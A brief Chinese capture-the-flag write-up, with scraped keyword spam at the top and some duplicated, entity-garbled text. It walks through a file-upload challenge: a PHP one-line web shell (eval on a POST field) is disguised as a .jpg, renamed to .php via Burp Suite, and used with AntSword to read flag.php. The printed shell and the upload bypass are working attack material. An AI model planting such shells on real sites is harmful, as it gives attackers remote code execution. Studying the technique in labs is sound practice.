北京网站建设飞沐,wordpress安装 var,wordpress highslide,网站外贸这是题目#xff0c;可以看出是个上传文件的题目#xff0c;考虑文件上传漏洞#xff0c;先随便上传一个文件试试#xff0c;要求上传的是图片。 可以看到上传成功。 考虑用一句话木马解决#xff0c;构造文件并修改后缀为jpg,然后上传。
?php
eval($_POST[attack])… 这是题目可以看出是个上传文件的题目考虑文件上传漏洞先随便上传一个文件试试要求上传的是图片。 可以看到上传成功。 考虑用一句话木马解决构造文件并修改后缀为jpg,然后上传。
?php
eval($_POST[attack]);
?上传成功 打开burpsuite, jpg改为php forward看到php格式上传成功 打开蚁剑 打开flag.php,找到flag
